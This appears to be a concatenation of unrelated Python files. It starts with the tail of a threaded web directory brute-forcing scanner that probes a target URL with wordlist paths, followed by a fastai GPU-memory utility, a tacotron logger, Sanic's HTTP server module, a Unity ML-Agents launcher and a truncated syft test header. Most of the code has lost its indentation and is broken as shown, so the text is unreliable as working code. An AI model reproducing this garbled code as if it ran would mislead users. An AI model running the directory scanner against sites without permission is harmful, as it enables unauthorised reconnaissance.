            # the with block closes the file; no explicit close() needed
            with open(r + '/' + file) as fd:
                try:
                    for line in fd:
                        url_queue.put(line.strip())
                except Exception:
                    # skip files that cannot be read or decoded
                    pass
def look_up_directory ():
while not url_queue.empty():
url_directory = url_queue.get()
r = http.request('GET', url_base + url_directory, headers=headers)
url_queue.task_done()
if r.status != 404:
print('[%d] => %s' % (r.status, url_base + url_directory))
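# A note on the worker loop above: testing url_queue.empty() before get()
# races once several workers drain the queue together (a worker can block
# forever on get() after another thread takes the last item), and workers can
# also exit while the producer thread is still filling the queue. A
# sentinel-based loop avoids both; minimal sketch, with `handle` standing in
# for the actual request logic:
#
#   def worker(q):
#       while True:
#           item = q.get()
#           if item is None:  # one sentinel is pushed per worker when done
#               break
#           handle(item)
#           q.task_done()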
# -----------------------------------------------------------------------------------------------------------------------------
# MAIN
# -----------------------------------------------------------------------------------------------------------------------------
def main (argv):
global url_queue, url_base, lists_dir
if not len(argv):
usage()
try:
opts, args = getopt.getopt(argv, "ht:l:", ["help", "target", "listdir"])
except getopt.GetoptError as err:
print("error: %s" % (str(err)))
usage()
for opt, arg in opts:
if opt in ("-h", "--help"):
usage()
elif opt in ("-t", "--target"):
url_base = arg + '/'
elif opt in ("-l", "--listdir"):
lists_dir = arg
else:
assert False, "Unhandled Option"
print("Attacking: %s" % (url_base))
# one producer thread fills the queue with candidate paths
producer = threading.Thread(target=expand_queue, args=())
producer.start()
# worker threads drain the queue; keep a reference to each so all can be
# joined (the original loop joined only the last thread, 15 times)
workers = []
for x in range(15):
    t = threading.Thread(target=look_up_directory, args=())
    t.start()
    workers.append(t)
producer.join()
for t in workers:
    t.join()
if __name__ == "__main__":
main(sys.argv[1:])
|
mem.py | "Utility functions for memory management"
from ..imports.torch import *
from ..core import *
from ..script import *
from ..utils.env import *
import pynvml, functools, traceback, threading, time
from collections import namedtuple
IS_IN_IPYTHON = is_in_ipython()
GPUMemory = namedtuple('GPUMemory', ['total', 'used', 'free'])
have_cuda = 0
if torch.cuda.is_available():
pynvml.nvmlInit()
have_cuda = 1
def preload_pytorch():
torch.ones((1, 1)).cuda()
def b2mb(num):
""" convert Bs to MBs and round down """
return int(num/2**20)
def gpu_mem_get(id=None):
"get total, used and free memory (in MBs) for gpu `id`. if `id` is not passed, currently selected torch device is used"
if not have_cuda: return GPUMemory(0, 0, 0)
if id is None: id = torch.cuda.current_device()
try:
handle = pynvml.nvmlDeviceGetHandleByIndex(id)
info = pynvml.nvmlDeviceGetMemoryInfo(handle)
return GPUMemory(*(map(b2mb, [info.total, info.used, info.free])))
except Exception:
return GPUMemory(0, 0, 0)
def gpu_mem_get_all():
"get total, used and free memory (in MBs) for each available gpu"
if not have_cuda: return []
return list(map(gpu_mem_get, range(pynvml.nvmlDeviceGetCount())))
def gpu_mem_get_free_no_cache():
"get free memory (in MBs) for the currently selected gpu id, after emptying the cache"
torch.cuda.empty_cache()
return gpu_mem_get().free
def gpu_mem_get_used_no_cache():
"get used memory (in MBs) for the currently selected gpu id, after emptying the cache"
torch.cuda.empty_cache()
return gpu_mem_get().used
def gpu_mem_get_used_fast(gpu_handle):
"get used memory (in MBs) for the currently selected gpu id, w/o emptying the cache, and needing the `gpu_handle` arg"
info = pynvml.nvmlDeviceGetMemoryInfo(gpu_handle)
return b2mb(info.used)
def gpu_with_max_free_mem():
"get [gpu_id, its_free_ram] for the first gpu with highest available RAM"
mem_all = gpu_mem_get_all()
if not len(mem_all): return None, 0
free_all = np.array([x.free for x in mem_all])
id = np.argmax(free_all)
return id, free_all[id]
def get_ref_free_exc_info():
"Free traceback from references to locals() in each frame to avoid circular reference leading to gc.collect() unable to reclaim memory"
type, val, tb = sys.exc_info()
traceback.clear_frames(tb)
return (type, val, tb)
def gpu_mem_restore(func):
"Reclaim GPU RAM if CUDA out of memory happened, or execution was interrupted"
@functools.wraps(func)
def wrapper(*args, **kwargs):
tb_clear_frames = os.environ.get('FASTAI_TB_CLEAR_FRAMES', None)
if not IS_IN_IPYTHON or tb_clear_frames=="0":
return func(*args, **kwargs)
try:
return func(*args, **kwargs)
except Exception as e:
if ("CUDA out of memory" in str(e) or
"device-side assert triggered" in str(e) or
tb_clear_frames == "1"):
type, val, tb = get_ref_free_exc_info() # must!
gc.collect()
raise type(val).with_traceback(tb) from None
else: raise # re-raises the exact last exception
return wrapper
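# Usage sketch for gpu_mem_restore (the `train` function is a placeholder):
# under ipython, a "CUDA out of memory" raised inside the wrapped call is
# re-raised with reference-free traceback frames, so gc.collect() can reclaim
# the GPU RAM that the stored exception would otherwise pin.
#
#   @gpu_mem_restore
#   def train(learn, epochs):
#       learn.fit(epochs)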
class gpu_mem_restore_ctx():
"context manager to reclaim RAM if an exception happened under ipython"
def __enter__(self): return self
def __exit__(self, exc_type, exc_val, exc_tb):
if not exc_val: return True
traceback.clear_frames(exc_tb)
gc.collect()
raise exc_type(exc_val).with_traceback(exc_tb) from None
class GPUMemTrace():
"Trace GPU allocated and peaked memory usage"
def __init__(self, silent=False):
assert torch.cuda.is_available(), "pytorch CUDA is required"
self.silent = silent # quickly turn off printouts from the constructor
self.reset()
def __enter__(self):
self.start()
return self
def __exit__(self, *exc):
self.stop()
def __repr__(self):
delta_used, delta_peaked = self.data()
return f"โณused: {delta_used}MB, โณpeaked: {delta_peaked}MB"
def set_silent(self, silent=False):
    # note: a method named `silent` would be shadowed by the instance
    # attribute assigned in __init__, so the setter has a distinct name
    self.silent = silent
def reset(self):
self.used_start = gpu_mem_get_used_no_cache()
self.used_peak = self.used_start
self.data_is_set = False
def start(self):
self.reset()
self.peak_monitor_start()
def stop(self):
self.data_set()
self.peak_monitor_stop()
def __del__(self):
self.stop()
def data_set(self):
self.delta_used = gpu_mem_get_used_no_cache() - self.used_start
self.delta_peaked = self.used_peak - self.used_start - self.delta_used
self.data_is_set = True
def data(self):
if not self.data_is_set: self.data_set()
return (self.delta_used, self.delta_peaked)
def report_n_reset(self, note=''):
self.report(note)
self.reset()
def report(self, note=''):
"printout used+peaked, and an optional context note"
if self.silent: return
delta_used, delta_peaked = self.data()
if note: note = f": {note}"
print(f"{self}{note}")
def peak_monitor_start(self):
self.peak_monitoring = True
# continually sample RAM usage
peak_monitor_thread = threading.Thread(target=self.peak_monitor_func)
peak_monitor_thread.daemon = True
peak_monitor_thread.start()
def peak_monitor_stop(self):
self.peak_monitoring = False
def peak_monitor_func(self):
gpu_handle = pynvml.nvmlDeviceGetHandleByIndex(torch.cuda.current_device())
while True:
self.used_peak = max(gpu_mem_get_used_fast(gpu_handle), self.used_peak)
if not self.peak_monitoring: break
time.sleep(0.001) # 1msec
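# Usage sketch for GPUMemTrace (requires CUDA; `run_step` is a placeholder
# and the numbers shown are illustrative):
#
#   with GPUMemTrace() as mem:
#       run_step()
#   mem.report('step')  # prints e.g. "△used: 120MB, △peaked: 80MB: step"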
|
infolog.py | import atexit
from datetime import datetime
import json
from threading import Thread
from urllib.request import Request, urlopen
_format = '%Y-%m-%d %H:%M:%S.%f'
_file = None
_run_name = None
_slack_url = None
def init(filename, run_name, slack_url=None):
global _file, _run_name, _slack_url
_close_logfile()
_file = open(filename, 'a', encoding="utf-8")
_file.write('\n-----------------------------------------------------------------\n')
_file.write('Starting new training run\n')
_file.write('-----------------------------------------------------------------\n')
_run_name = run_name
_slack_url = slack_url
def log(msg, slack=False):
print(msg)
if _file is not None:
    # the logfile is opened with encoding='utf-8', so write the text itself;
    # writing an encoded bytes object through '%s' would log "b'...'" reprs
    _file.write('[%s] %s\n' % (datetime.now().strftime(_format)[:-3], msg))
if slack and _slack_url is not None:
    Thread(target=_send_slack, args=(msg,)).start()
def _close_logfile():
global _file
if _file is not None:
_file.close()
_file = None
def _send_slack(msg):
req = Request(_slack_url)
req.add_header('Content-Type', 'application/json')
urlopen(req, json.dumps({
'username': 'tacotron',
'icon_emoji': ':taco:',
'text': '*%s*: %s' % (_run_name, msg)
}).encode())
atexit.register(_close_logfile)
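# Usage sketch (filename and run name are illustrative):
#
#   init('logs/train.log', run_name='tacotron-1')
#   log('step 1000: loss=0.123')            # console + logfile
#   log('training finished', slack=True)    # also posted if a slack_url was given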
|
server.py | import asyncio
import os
import traceback
from functools import partial
from inspect import isawaitable
from multiprocessing import Process
from signal import SIG_IGN, SIGINT, SIGTERM, Signals
from signal import signal as signal_func
from socket import SO_REUSEADDR, SOL_SOCKET, socket
from time import time
from httptools import HttpRequestParser
from httptools.parser.errors import HttpParserError
from multidict import CIMultiDict
from sanic.exceptions import (
InvalidUsage,
PayloadTooLarge,
RequestTimeout,
ServerError,
ServiceUnavailable,
)
from sanic.log import access_logger, logger
from sanic.request import Request, StreamBuffer
from sanic.response import HTTPResponse
try:
import uvloop
asyncio.set_event_loop_policy(uvloop.EventLoopPolicy())
except ImportError:
pass
current_time = None
class Signal:
stopped = False
class HttpProtocol(asyncio.Protocol):
"""
This class provides a basic HTTP implementation of the sanic framework.
"""
__slots__ = (
# event loop, connection
"loop",
"transport",
"connections",
"signal",
# request params
"parser",
"request",
"url",
"headers",
# request config
"request_handler",
"request_timeout",
"response_timeout",
"keep_alive_timeout",
"request_max_size",
"request_buffer_queue_size",
"request_class",
"is_request_stream",
"router",
"error_handler",
# enable or disable access log purpose
"access_log",
# connection management
"_total_request_size",
"_request_timeout_handler",
"_response_timeout_handler",
"_keep_alive_timeout_handler",
"_last_request_time",
"_last_response_time",
"_is_stream_handler",
"_not_paused",
"_request_handler_task",
"_request_stream_task",
"_keep_alive",
"_header_fragment",
"state",
"_debug",
)
def __init__(
self,
*,
loop,
request_handler,
error_handler,
signal=Signal(),
connections=None,
request_timeout=60,
response_timeout=60,
keep_alive_timeout=5,
request_max_size=None,
request_buffer_queue_size=100,
request_class=None,
access_log=True,
keep_alive=True,
is_request_stream=False,
router=None,
state=None,
debug=False,
**kwargs
):
self.loop = loop
self.transport = None
self.request = None
self.parser = None
self.url = None
self.headers = None
self.router = router
self.signal = signal
self.access_log = access_log
self.connections = connections or set()
self.request_handler = request_handler
self.error_handler = error_handler
self.request_timeout = request_timeout
self.request_buffer_queue_size = request_buffer_queue_size
self.response_timeout = response_timeout
self.keep_alive_timeout = keep_alive_timeout
self.request_max_size = request_max_size
self.request_class = request_class or Request
self.is_request_stream = is_request_stream
self._is_stream_handler = False
self._not_paused = asyncio.Event(loop=loop)
self._total_request_size = 0
self._request_timeout_handler = None
self._response_timeout_handler = None
self._keep_alive_timeout_handler = None
self._last_request_time = None
self._last_response_time = None
self._request_handler_task = None
self._request_stream_task = None
self._keep_alive = keep_alive
self._header_fragment = b""
self.state = state if state else {}
if "requests_count" not in self.state:
self.state["requests_count"] = 0
self._debug = debug
self._not_paused.set()
@property
def keep_alive(self):
"""
Check if the connection needs to be kept alive based on the params
attached to the `_keep_alive` attribute, :attr:`Signal.stopped`
and :func:`HttpProtocol.parser.should_keep_alive`
:return: ``True`` if the connection is to be kept alive, ``False`` otherwise
"""
return (
self._keep_alive
and not self.signal.stopped
and self.parser.should_keep_alive()
)
# -------------------------------------------- #
# Connection
# -------------------------------------------- #
def connection_made(self, transport):
self.connections.add(self)
self._request_timeout_handler = self.loop.call_later(
self.request_timeout, self.request_timeout_callback
)
self.transport = transport
self._last_request_time = current_time
def connection_lost(self, exc):
self.connections.discard(self)
if self._request_handler_task:
self._request_handler_task.cancel()
if self._request_stream_task:
self._request_stream_task.cancel()
if self._request_timeout_handler:
self._request_timeout_handler.cancel()
if self._response_timeout_handler:
self._response_timeout_handler.cancel()
if self._keep_alive_timeout_handler:
self._keep_alive_timeout_handler.cancel()
def pause_writing(self):
self._not_paused.clear()
def resume_writing(self):
self._not_paused.set()
def request_timeout_callback(self):
# See the docstring in the RequestTimeout exception, to see
# exactly what this timeout is checking for.
# Check if elapsed time since request initiated exceeds our
# configured maximum request timeout value
time_elapsed = current_time - self._last_request_time
if time_elapsed < self.request_timeout:
time_left = self.request_timeout - time_elapsed
self._request_timeout_handler = self.loop.call_later(
time_left, self.request_timeout_callback
)
else:
if self._request_stream_task:
self._request_stream_task.cancel()
if self._request_handler_task:
self._request_handler_task.cancel()
self.write_error(RequestTimeout("Request Timeout"))
def response_timeout_callback(self):
# Check if elapsed time since response was initiated exceeds our
# configured maximum request timeout value
time_elapsed = current_time - self._last_request_time
if time_elapsed < self.response_timeout:
time_left = self.response_timeout - time_elapsed
self._response_timeout_handler = self.loop.call_later(
time_left, self.response_timeout_callback
)
else:
if self._request_stream_task:
self._request_stream_task.cancel()
if self._request_handler_task:
self._request_handler_task.cancel()
self.write_error(ServiceUnavailable("Response Timeout"))
def keep_alive_timeout_callback(self):
"""
Check if elapsed time since last response exceeds our configured
maximum keep alive timeout value and if so, close the transport
pipe and let the response writer handle the error.
:return: None
"""
time_elapsed = current_time - self._last_response_time
if time_elapsed < self.keep_alive_timeout:
time_left = self.keep_alive_timeout - time_elapsed
self._keep_alive_timeout_handler = self.loop.call_later(
time_left, self.keep_alive_timeout_callback
)
else:
logger.debug("KeepAlive Timeout. Closing connection.")
self.transport.close()
self.transport = None
# -------------------------------------------- #
# Parsing
# -------------------------------------------- #
def data_received(self, data):
# Check for the request itself getting too large and exceeding
# memory limits
self._total_request_size += len(data)
if self._total_request_size > self.request_max_size:
self.write_error(PayloadTooLarge("Payload Too Large"))
# Create parser if this is the first time we're receiving data
if self.parser is None:
assert self.request is None
self.headers = []
self.parser = HttpRequestParser(self)
# requests count
self.state["requests_count"] = self.state["requests_count"] + 1
# Parse request chunk or close connection
try:
self.parser.feed_data(data)
except HttpParserError:
message = "Bad Request"
if self._debug:
message += "\n" + traceback.format_exc()
self.write_error(InvalidUsage(message))
def on_url(self, url):
if not self.url:
self.url = url
else:
self.url += url
def on_header(self, name, value):
self._header_fragment += name
if value is not None:
if (
self._header_fragment == b"Content-Length"
and int(value) > self.request_max_size
):
self.write_error(PayloadTooLarge("Payload Too Large"))
try:
value = value.decode()
except UnicodeDecodeError:
value = value.decode("latin_1")
self.headers.append(
(self._header_fragment.decode().casefold(), value)
)
self._header_fragment = b""
def on_headers_complete(self):
self.request = self.request_class(
url_bytes=self.url,
headers=CIMultiDict(self.headers),
version=self.parser.get_http_version(),
method=self.parser.get_method().decode(),
transport=self.transport,
)
# Remove any existing KeepAlive handler here;
# it will be recreated if required on the new request.
if self._keep_alive_timeout_handler:
self._keep_alive_timeout_handler.cancel()
self._keep_alive_timeout_handler = None
if self.is_request_stream:
self._is_stream_handler = self.router.is_stream_handler(
self.request
)
if self._is_stream_handler:
self.request.stream = StreamBuffer(
self.request_buffer_queue_size
)
self.execute_request_handler()
def on_body(self, body):
if self.is_request_stream and self._is_stream_handler:
self._request_stream_task = self.loop.create_task(
self.body_append(body)
)
else:
self.request.body_push(body)
async def body_append(self, body):
if self.request.stream.is_full():
self.transport.pause_reading()
await self.request.stream.put(body)
self.transport.resume_reading()
else:
await self.request.stream.put(body)
def on_message_complete(self):
# Entire request (headers and whole body) is received.
# We can cancel and remove the request timeout handler now.
if self._request_timeout_handler:
self._request_timeout_handler.cancel()
self._request_timeout_handler = None
if self.is_request_stream and self._is_stream_handler:
self._request_stream_task = self.loop.create_task(
self.request.stream.put(None)
)
return
self.request.body_finish()
self.execute_request_handler()
def execute_request_handler(self):
"""
Invoke the request handler defined by the
:func:`sanic.app.Sanic.handle_request` method
:return: None
"""
self._response_timeout_handler = self.loop.call_later(
self.response_timeout, self.response_timeout_callback
)
self._last_request_time = current_time
self._request_handler_task = self.loop.create_task(
self.request_handler(
self.request, self.write_response, self.stream_response
)
)
# -------------------------------------------- #
# Responding
# -------------------------------------------- #
def log_response(self, response):
"""
Helper method that logs responses when
:attr:`HttpProtocol.access_log` is enabled.
:param response: Response generated for the current request
:type response: :class:`sanic.response.HTTPResponse` or
:class:`sanic.response.StreamingHTTPResponse`
:return: None
"""
if self.access_log:
extra = {"status": getattr(response, "status", 0)}
if isinstance(response, HTTPResponse):
extra["byte"] = len(response.body)
else:
extra["byte"] = -1
extra["host"] = "UNKNOWN"
if self.request is not None:
if self.request.ip:
extra["host"] = "{0}:{1}".format(
self.request.ip, self.request.port
)
extra["request"] = "{0} {1}".format(
self.request.method, self.request.url
)
else:
extra["request"] = "nil"
access_logger.info("", extra=extra)
def write_response(self, response):
"""
Writes response content synchronously to the transport.
"""
if self._response_timeout_handler:
self._response_timeout_handler.cancel()
self._response_timeout_handler = None
try:
keep_alive = self.keep_alive
self.transport.write(
response.output(
self.request.version, keep_alive, self.keep_alive_timeout
)
)
self.log_response(response)
except AttributeError:
logger.error(
"Invalid response object for url %s, "
"Expected Type: HTTPResponse, Actual Type: %s",
self.url,
type(response),
)
self.write_error(ServerError("Invalid response type"))
except RuntimeError:
if self._debug:
logger.error(
"Connection lost before response written @ %s",
self.request.ip,
)
keep_alive = False
except Exception as e:
self.bail_out(
"Writing response failed, connection closed {}".format(repr(e))
)
finally:
if not keep_alive:
self.transport.close()
self.transport = None
else:
self._keep_alive_timeout_handler = self.loop.call_later(
self.keep_alive_timeout, self.keep_alive_timeout_callback
)
self._last_response_time = current_time
self.cleanup()
async def drain(self):
await self._not_paused.wait()
def push_data(self, data):
self.transport.write(data)
async def stream_response(self, response):
"""
Streams a response to the client asynchronously. Attaches
the transport to the response so the response consumer can
write to the response as needed.
"""
if self._response_timeout_handler:
self._response_timeout_handler.cancel()
self._response_timeout_handler = None
try:
keep_alive = self.keep_alive
response.protocol = self
await response.stream(
self.request.version, keep_alive, self.keep_alive_timeout
)
self.log_response(response)
except AttributeError:
logger.error(
"Invalid response object for url %s, "
"Expected Type: HTTPResponse, Actual Type: %s",
self.url,
type(response),
)
self.write_error(ServerError("Invalid response type"))
except RuntimeError:
if self._debug:
logger.error(
"Connection lost before response written @ %s",
self.request.ip,
)
keep_alive = False
except Exception as e:
self.bail_out(
"Writing response failed, connection closed {}".format(repr(e))
)
finally:
if not keep_alive:
self.transport.close()
self.transport = None
else:
self._keep_alive_timeout_handler = self.loop.call_later(
self.keep_alive_timeout, self.keep_alive_timeout_callback
)
self._last_response_time = current_time
self.cleanup()
def write_error(self, exception):
# An error _is_ a response.
# Don't throw a response timeout when a response _is_ given.
if self._response_timeout_handler:
self._response_timeout_handler.cancel()
self._response_timeout_handler = None
response = None
try:
response = self.error_handler.response(self.request, exception)
version = self.request.version if self.request else "1.1"
self.transport.write(response.output(version))
except RuntimeError:
if self._debug:
logger.error(
"Connection lost before error written @ %s",
self.request.ip if self.request else "Unknown",
)
except Exception as e:
self.bail_out(
"Writing error failed, connection closed {}".format(repr(e)),
from_error=True,
)
finally:
if self.parser and (
self.keep_alive or getattr(response, "status", 0) == 408
):
self.log_response(response)
try:
self.transport.close()
except AttributeError:
logger.debug("Connection lost before server could close it.")
def bail_out(self, message, from_error=False):
"""
If the transport pipe is already closed and the sanic app encounters
an error while writing data to it, log the error
with proper details.
:param message: Error message to display
:param from_error: If the bail out was invoked while handling an
exception scenario.
:type message: str
:type from_error: bool
:return: None
"""
if from_error or self.transport.is_closing():
logger.error(
"Transport closed @ %s and exception "
"experienced during error handling",
self.transport.get_extra_info("peername"),
)
logger.debug("Exception:", exc_info=True)
else:
self.write_error(ServerError(message))
logger.error(message)
def cleanup(self):
"""This is called when KeepAlive feature is used,
it resets the connection in order for it to be able
to handle receiving another request on the same connection."""
self.parser = None
self.request = None
self.url = None
self.headers = None
self._request_handler_task = None
self._request_stream_task = None
self._total_request_size = 0
self._is_stream_handler = False
def close_if_idle(self):
"""Close the connection if a request is not being sent or received
:return: boolean - True if closed, false if staying open
"""
if not self.parser:
self.transport.close()
return True
return False
def close(self):
"""
Force close the connection.
"""
if self.transport is not None:
self.transport.close()
self.transport = None
def update_current_time(loop):
"""Cache the current time, since it is needed at the end of every
keep-alive request to update the request timeout time.
:param loop: event loop used to schedule the once-per-second refresh
:return: None
"""
global current_time
current_time = time()
loop.call_later(1, partial(update_current_time, loop))
def trigger_events(events, loop):
"""Trigger event callbacks (functions or async)
:param events: one or more sync or async functions to execute
:param loop: event loop
"""
for event in events:
result = event(loop)
if isawaitable(result):
loop.run_until_complete(result)
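# A minimal sketch (not part of Sanic) of how trigger_events() treats sync
# and async listeners uniformly; the listener names below are hypothetical.
def _example_trigger_events(loop):
    def on_start(loop):
        print("sync listener runs inline")

    async def on_start_async(loop):
        print("awaitable listener is driven via run_until_complete")

    trigger_events([on_start, on_start_async], loop)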
def serve(
host,
port,
request_handler,
error_handler,
before_start=None,
after_start=None,
before_stop=None,
after_stop=None,
debug=False,
request_timeout=60,
response_timeout=60,
keep_alive_timeout=5,
ssl=None,
sock=None,
request_max_size=None,
request_buffer_queue_size=100,
reuse_port=False,
loop=None,
protocol=HttpProtocol,
backlog=100,
register_sys_signals=True,
run_multiple=False,
run_async=False,
connections=None,
signal=Signal(),
request_class=None,
access_log=True,
keep_alive=True,
is_request_stream=False,
router=None,
websocket_max_size=None,
websocket_max_queue=None,
websocket_read_limit=2 ** 16,
websocket_write_limit=2 ** 16,
state=None,
graceful_shutdown_timeout=15.0,
asyncio_server_kwargs=None,
):
"""Start asynchronous HTTP Server on an individual process.
:param host: Address to host on
:param port: Port to host on
:param request_handler: Sanic request handler with middleware
:param error_handler: Sanic error handler with middleware
:param before_start: function to be executed before the server starts
listening. Takes arguments `app` instance and `loop`
:param after_start: function to be executed after the server starts
listening. Takes arguments `app` instance and `loop`
:param before_stop: function to be executed when a stop signal is
received before it is respected. Takes arguments
`app` instance and `loop`
:param after_stop: function to be executed when a stop signal is
received after it is respected. Takes arguments
`app` instance and `loop`
:param debug: enables debug output (slows server)
:param request_timeout: time in seconds
:param response_timeout: time in seconds
:param keep_alive_timeout: time in seconds
:param ssl: SSLContext
:param sock: Socket for the server to accept connections from
:param request_max_size: size in bytes, `None` for no limit
:param reuse_port: `True` for multiple workers
:param loop: asyncio compatible event loop
:param protocol: subclass of asyncio protocol class
:param request_class: Request class to use
:param access_log: disable/enable access log
:param websocket_max_size: enforces the maximum size for
incoming messages in bytes.
:param websocket_max_queue: sets the maximum length of the queue
that holds incoming messages.
:param websocket_read_limit: sets the high-water limit of the buffer for
incoming bytes, the low-water limit is half
the high-water limit.
:param websocket_write_limit: sets the high-water limit of the buffer for
outgoing bytes, the low-water limit is a
quarter of the high-water limit.
:param is_request_stream: disable/enable Request.stream
:param request_buffer_queue_size: streaming request buffer queue size
:param router: Router object
:param graceful_shutdown_timeout: how long to wait before force-closing
non-idle connections
:param asyncio_server_kwargs: key-value args for asyncio/uvloop
create_server method
:return: Nothing
"""
if not run_async:
# create new event_loop after fork
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
if debug:
loop.set_debug(debug)
connections = connections if connections is not None else set()
server = partial(
protocol,
loop=loop,
connections=connections,
signal=signal,
request_handler=request_handler,
error_handler=error_handler,
request_timeout=request_timeout,
response_timeout=response_timeout,
keep_alive_timeout=keep_alive_timeout,
request_max_size=request_max_size,
request_class=request_class,
access_log=access_log,
keep_alive=keep_alive,
is_request_stream=is_request_stream,
router=router,
websocket_max_size=websocket_max_size,
websocket_max_queue=websocket_max_queue,
websocket_read_limit=websocket_read_limit,
websocket_write_limit=websocket_write_limit,
state=state,
debug=debug,
)
asyncio_server_kwargs = (
asyncio_server_kwargs if asyncio_server_kwargs else {}
)
server_coroutine = loop.create_server(
server,
host,
port,
ssl=ssl,
reuse_port=reuse_port,
sock=sock,
backlog=backlog,
**asyncio_server_kwargs
)
# Instead of pulling time at the end of every request,
# pull it once per second
loop.call_soon(partial(update_current_time, loop))
if run_async:
return server_coroutine
trigger_events(before_start, loop)
try:
http_server = loop.run_until_complete(server_coroutine)
except BaseException:
logger.exception("Unable to start server")
return
trigger_events(after_start, loop)
# Ignore SIGINT when run_multiple
if run_multiple:
signal_func(SIGINT, SIG_IGN)
# Register signals for graceful termination
if register_sys_signals:
_signals = (SIGTERM,) if run_multiple else (SIGINT, SIGTERM)
for _signal in _signals:
try:
loop.add_signal_handler(_signal, loop.stop)
except NotImplementedError:
logger.warning(
"Sanic tried to use loop.add_signal_handler "
"but it is not implemented on this platform."
)
pid = os.getpid()
try:
logger.info("Starting worker [%s]", pid)
loop.run_forever()
finally:
logger.info("Stopping worker [%s]", pid)
# Run the on_stop function if provided
trigger_events(before_stop, loop)
# Wait for event loop to finish and all connections to drain
http_server.close()
loop.run_until_complete(http_server.wait_closed())
# Complete all tasks on the loop
signal.stopped = True
for connection in connections:
connection.close_if_idle()
# Graceful shutdown timeout.
# We honor graceful_shutdown_timeout instead of
# letting connections hang forever.
# Roughly track the elapsed time below.
start_shutdown = 0
while connections and (start_shutdown < graceful_shutdown_timeout):
loop.run_until_complete(asyncio.sleep(0.1))
start_shutdown = start_shutdown + 0.1
# Force close non-idle connection after waiting for
# graceful_shutdown_timeout
coros = []
for conn in connections:
if hasattr(conn, "websocket") and conn.websocket:
coros.append(conn.websocket.close_connection())
else:
conn.close()
_shutdown = asyncio.gather(*coros, loop=loop)
loop.run_until_complete(_shutdown)
trigger_events(after_stop, loop)
loop.close()
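# Hedged usage sketch (hypothetical wiring, not taken from the Sanic docs):
# serve() is normally invoked for you by Sanic.run(); a direct call needs
# at least the app's request handler, error handler and router.
#
#   app = Sanic(__name__)
#   serve(host="127.0.0.1", port=8000,
#         request_handler=app.handle_request,
#         error_handler=app.error_handler,
#         router=app.router)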
def serve_multiple(server_settings, workers):
"""Start multiple server processes simultaneously. Stop on interrupt
and terminate signals, and drain connections when complete.
:param server_settings: kw arguments to be passed to the serve function
:param workers: number of workers to launch
:return:
"""
server_settings["reuse_port"] = True
server_settings["run_multiple"] = True
# Handling when custom socket is not provided.
if server_settings.get("sock") is None:
sock = socket()
sock.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
sock.bind((server_settings["host"], server_settings["port"]))
sock.set_inheritable(True)
server_settings["sock"] = sock
server_settings["host"] = None
server_settings["port"] = None
def sig_handler(signal, frame):
logger.info("Received signal %s. Shutting down.", Signals(signal).name)
for process in processes:
os.kill(process.pid, SIGTERM)
signal_func(SIGINT, lambda s, f: sig_handler(s, f))
signal_func(SIGTERM, lambda s, f: sig_handler(s, f))
processes = []
for _ in range(workers):
process = Process(target=serve, kwargs=server_settings)
process.daemon = True
process.start()
processes.append(process)
for process in processes:
process.join()
# the join() calls above block until the worker processes stop
for process in processes:
process.terminate()
server_settings.get("sock").close()
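# Hedged sketch (hypothetical settings dict): serve_multiple() forks
# `workers` processes sharing a single SO_REUSEADDR socket.
#
#   settings = dict(host="0.0.0.0", port=8000,
#                   request_handler=app.handle_request,
#                   error_handler=app.error_handler)
#   serve_multiple(settings, workers=4)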
|
learn.py | # # Unity ML-Agents Toolkit
import logging
from multiprocessing import Process, Queue
import numpy as np
from docopt import docopt
from mlagents.trainers.trainer_controller import TrainerController
from mlagents.trainers.exception import TrainerError
def run_training(sub_id, run_seed, run_options, process_queue):
"""
Launches training session.
:param process_queue: Queue used to send signal back to main.
:param sub_id: Unique id for training session.
:param run_seed: Random seed used for training.
:param run_options: Command line arguments for training.
"""
# Docker Parameters
docker_target_name = (run_options['--docker-target-name']
if run_options['--docker-target-name'] != 'None' else None)
# General parameters
env_path = None
run_id = run_options['--run-id']
load_model = run_options['--load']
train_model = run_options['--train']
save_freq = int(run_options['--save-freq'])
keep_checkpoints = int(run_options['--keep-checkpoints'])
worker_id = 0
curriculum_file = None
lesson = 0
fast_simulation = False
no_graphics = False
trainer_config_path = run_options['<trainer-config-path>']
# Create controller and launch environment.
tc = TrainerController(env_path, run_id + '-' + str(sub_id),
save_freq, curriculum_file, fast_simulation,
load_model, train_model, worker_id + sub_id,
keep_checkpoints, lesson, run_seed,
docker_target_name, trainer_config_path, no_graphics)
# Signal that environment has been launched.
# process_queue.put(True)
# Begin training
tc.start_learning()
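# Hedged usage sketch (hypothetical values): launching a single training
# session directly, without the multiprocessing scaffolding in main() below.
#
#   options = docopt(_USAGE)
#   run_training(sub_id=0, run_seed=1234, run_options=options,
#                process_queue=None)  # the queue is unused in this variant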
def main():
try:
print('''
                        [Unity ML-Agents ASCII-art logo]
''')
except:
print('\n\n\tUnity Technologies\n')
logger = logging.getLogger('mlagents.trainers')
_USAGE = '''
Usage:
mlagents-learn <trainer-config-path> [options]
mlagents-learn --help
Options:
--env=<file> Name of the Unity executable [default: None].
--curriculum=<directory> Curriculum json directory for environment [default: None].
--keep-checkpoints=<n> How many model checkpoints to keep [default: 5].
--lesson=<n> Start learning from this lesson [default: 0].
--load Whether to load the model or randomly initialize [default: False].
--run-id=<path> The directory name for model and summary statistics [default: ppo].
--num-runs=<n> Number of concurrent training sessions [default: 1].
--save-freq=<n> Frequency at which to save model [default: 50000].
--seed=<n> Random seed used for training [default: -1].
--slow Whether to run the game at training speed [default: False].
--train Whether to train model, or only run inference [default: False].
--worker-id=<n> Number to add to communication port (5005) [default: 0].
--docker-target-name=<dt> Docker volume to store training-specific files [default: None].
--no-graphics Whether to run the environment in no-graphics mode [default: False].
'''
options = docopt(_USAGE)
logger.info(options)
num_runs = int(options['--num-runs'])
seed = int(options['--seed'])
if options['--env'] == 'None' and num_runs > 1:
raise TrainerError('It is not possible to launch more than one concurrent training session '
'when training from the editor.')
jobs = []
run_seed = seed
# options['--env'] = None
# options[]
run_training(1, run_seed, options, None)
# for i in range(num_runs):
# if seed == -1:
# run_seed = np.random.randint(0, 10000)
# process_queue = Queue()
# p = Process(target=run_training, args=(i, run_seed, options, process_queue))
# jobs.append(p)
# p.start()
# # Wait for signal that environment has successfully launched
# while process_queue.get() is not True:
# continue
if __name__ == '__main__':
main() |
duet_test.py | # stdlib
import atexit
from multiprocessing import Process
from multiprocessing import set_start_method
import socket
import sys
import time
from typing import Any
from typing import Generator
from typing import List
# third party
import pytest
# syft absolute
import syft as sy
# syft relative
from ...grid.duet.process_test import SyftTestProcess
